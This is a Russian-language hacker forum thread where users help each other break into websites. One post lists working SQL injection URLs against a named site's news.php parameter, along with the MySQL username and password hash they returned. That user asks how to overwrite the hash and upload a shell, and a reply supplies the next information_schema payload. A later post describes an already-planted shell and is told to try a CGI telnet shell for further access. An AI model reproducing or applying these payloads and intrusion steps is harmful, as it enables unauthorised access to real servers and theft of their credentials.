Мож кто -нибудь осветит мой вопрос по mod_rewrite?
Вот уязвимый скрипт

Невижу вопроса. /85-1.html уязвимость есть.

Вопрос не в этом вопрос в том как это обходить!Он просто выводит пустую страницу,при обычных запросах,здесь нужен посимв.перебор?

Здравствуйте! Я долго копался на этом форуме и нашел где мне помогут насчет SQL-инъекции на сайте
Site:www.4what.com
Зайдя на https://www.4what.com/news.php?id=55' появилась ошибка:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/fwhat/public_html/news.php on line 149
Далее зашел на
http://www.4what.com/news.php?id=-1+union+select+1,2,user+from+mysql.user/*
высветилось логин:4what
потом
http://www.4what.com/news.php?id=-1+union+select+null,mysql.user.password,null+from+ mysql.user/*
высветилось хэш:*832547126835E90D7CCB5772A85B0E6552904217
(а зачем звездочка?)
Дальше не знаю
Можно ли этот хэш поменять на свой? И какой командой(UPDATE? не получается че то)
И последний вопрос Подскажите что надо сделать что бы загрузитьт туда шелл
Спасибо вам за ответы кто ответит....

А точка с запятой?

Там версия пятая. Какие проблемы?
table_name+from+information_schema.tables+limit+1, 1/*
И поехали...

Спасибо Ch3ck за помощь!

Народ help плиз. Вообщем тема такая на одном сервере *nix я залил shell но доступ имею только к своей папке и всё большинство опций разрешено, но я так как новичек не шибко могу сам пользоваться командами так как незнаю, я проверил все программы на уязвимость но админ следит за апргрейдами и постоянно обновляет. Я всегда пользовался эксплоитами и этого хватало пока, но теперь что делать только через брут или можно попробовать какие либо команды.
З.Ы. К папке этого пользователя под кем я зашел имею полный доступ.

Попробуй cgi шелл .. (теги: telnet.cgi)